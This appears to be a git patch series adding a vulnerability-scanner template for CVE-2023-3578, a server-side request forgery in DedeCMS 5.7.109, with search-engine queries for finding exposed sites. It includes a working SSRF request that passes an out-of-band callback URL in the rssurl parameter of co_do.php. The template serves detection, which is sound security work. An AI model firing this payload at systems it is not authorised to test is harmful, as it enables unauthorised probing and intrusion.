From c8826be87e36f8de98694e84493dd03e3f8c2625 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Sep 2024 17:06:04 +0400 Subject: [PATCH 1/2] Create CVE-2023-3578.yaml --- http/cves/2023/CVE-2023-3578.yaml | 58 +++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3578.yaml diff --git a/http/cves/2023/CVE-2023-3578.yaml b/http/cves/2023/CVE-2023-3578.yaml new file mode 100644 index 00000000000..71f2874cfce --- /dev/null +++ b/http/cves/2023/CVE-2023-3578.yaml @@ -0,0 +1,58 @@ +id: CVE-2023-3578 + +info: + name: DedeCMS 5.7.109 - Server-Side Request Forgery + author: ritikchaddha + severity: critical + description: | + Manipulation of the rssurl parameter in co_do.php leads to server-side request forgery in DedeCMS version 5.7.109. + impact: | + Successful exploitation could lead to sensitive data exposure, server-side request forgery, and potential server compromise. + remediation: | + Apply the vendor-supplied patch or update to a non-vulnerable version of DedeCMS. + reference: + - https://github.com/nightcloudos/cve/blob/main/SSRF.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3578 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3578 + cwe-id: CWE-918 + epss-score: 0.00063 + epss-percentile: 0.26288 + cpe: cpe:2.3:a:dedecms:dedecms:5.7.109:*:*:*:*:*:*:* + metadata: + vendor: dedecms + product: dedecms + shodan-query: http.html:"DedeCms" + fofa-query: app="DedeCMS" + tags: cve,cve2023,dedecms,ssrf + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: response + words: + - "DedeCms" + case-insensitive: true + + - raw: + - | + GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + - "http" From a3294fcb5ee12c42a29cab7e90b1561169858c0e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 24 Sep 2024 03:20:58 +0530 Subject: [PATCH 2/2] added missing tag --- http/cves/2023/CVE-2023-3578.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-3578.yaml b/http/cves/2023/CVE-2023-3578.yaml index 71f2874cfce..ea7748120ec 100644 --- a/http/cves/2023/CVE-2023-3578.yaml +++ b/http/cves/2023/CVE-2023-3578.yaml @@ -26,7 +26,7 @@ info: product: dedecms shodan-query: http.html:"DedeCms" fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms,ssrf + tags: cve,cve2023,dedecms,ssrf,oast flow: http(1) && http(2)